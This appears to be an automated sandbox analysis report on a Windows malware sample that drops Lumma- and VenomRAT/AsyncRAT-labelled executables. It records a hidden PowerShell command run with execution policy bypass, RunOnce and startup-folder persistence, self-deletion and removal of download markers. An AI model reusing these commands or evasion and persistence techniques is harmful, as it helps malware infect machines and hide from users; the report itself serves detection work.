Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2733250356.000002EC2EF61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2EF1E000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000012.00000000.2710580492.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000012.00000002.4109799058.0000000000402000.00000002.00000001.01000000.00000013.sdmp, lm.exe, 00000013.00000000.2710612115.0000000000402000.00000002.00000001.01000000.00000014.sdmp, lm.exe, 00000013.00000002.3156773768.0000000000402000.00000002.00000001.01000000.00000014.sdmp, vm.exe, 00000019.00000000.2826688017.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe, 00000019.00000002.3132755936.0000000000402000.00000002.00000001.01000000.00000013.sdmp, vm.exe.14.dr, lm.exe.14.dr
Source:	Binary string: System.Core.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Windows.Forms.pdb- source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Core.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Unpacked PE file: 0.2.FpiUD4nYpj.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cis:R;.yureg:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\jjistfr	Unpacked PE file: 3.2.jjistfr.400000.0.unpack .text:ER;.rdata:R;.data:W;.cis:R;.yureg:W;.rsrc:R; vs .text:EW;

.NET source code contains potential unpacker

Source: 18.2.vm.exe.29e0000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 25.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA764F0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,

18_2_6CA764F0

Source: FpiUD4nYpj.exe	Static PE information: section name: .cis
Source: FpiUD4nYpj.exe	Static PE information: section name: .yureg
Source: 34CA.exe.1.dr	Static PE information: section name: .xdata
Source: jjistfr.1.dr	Static PE information: section name: .cis
Source: jjistfr.1.dr	Static PE information: section name: .yureg

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_00403230 push eax; ret	0_2_00403302
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_004026FF push ecx; ret	0_2_0040270B
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_026E168F push esi; retf	0_2_026E16BC
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_026E2766 push ecx; ret	0_2_026E2772
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_02735863 push ss; retf	0_2_02735876
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_0272D867 push eax; retf	0_2_0272D87D
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_02736C2B pushad ; retf	0_2_02736CA4
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_02736C0C pushad ; retf	0_2_02736CA4
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_027354BF push edi; retf	0_2_027354CA
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_027358A4 push ss; retf	0_2_02735876
Source: C:\Users\user\Desktop\FpiUD4nYpj.exe	Code function: 0_2_02735485 push edi; retf	0_2_027354CA
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_00403230 push eax; ret	3_2_00403302
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_004026FF push ecx; ret	3_2_0040270B
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0256168F push esi; retf	3_2_025616BC
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_02562766 push ecx; ret	3_2_02562772
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0259684B pushad ; retf	3_2_025968C4
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_0259682C pushad ; retf	3_2_025968C4
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_025950DF push edi; retf	3_2_025950EA
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_025954C4 push ss; retf	3_2_02595496
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_02595483 push ss; retf	3_2_02595496
Source: C:\Users\user\AppData\Roaming\jjistfr	Code function: 3_2_025950A5 push edi; retf	3_2_025950EA
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A7075 pushad ; iretd	10_2_00007FFD9B9A709A
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A6FF8 pushad ; iretd	10_2_00007FFD9B9A709A
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A6FD3 pushad ; iretd	10_2_00007FFD9B9A709A
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9AE72A push eax; ret	10_2_00007FFD9B9AE72B
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9AE73A pushad ; ret	10_2_00007FFD9B9AE73B
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A0DFE push eax; retf	10_2_00007FFD9B9A0E1D
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9B9A0DD5 push eax; ret	10_2_00007FFD9B9A0DFD
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9BA923E1 push 8B485F90h; iretd	10_2_00007FFD9BA923E6
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9BA9238C push 8B485F90h; iretd	10_2_00007FFD9BA92391
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Code function: 10_2_00007FFD9BA919EB push edi; iretd	10_2_00007FFD9BA919EC

Source: FpiUD4nYpj.exe	Static PE information: section name: .text entropy: 7.772500849471365
Source: jjistfr.1.dr	Static PE information: section name: .text entropy: 7.772500849471365

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BD9E.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2FBE.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\34CA.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jjistfr	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jjistfr

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 18.2.vm.exe.29e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vm.exe.29e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5252, type: MEMORYSTR

Creates autostart registry keys with suspicious names

Source: C:\Windows\explorer.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY

Jump to behavior

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#0005_8yUscnjrUY	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\fpiud4nypj.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\jjistfr:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34CA.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
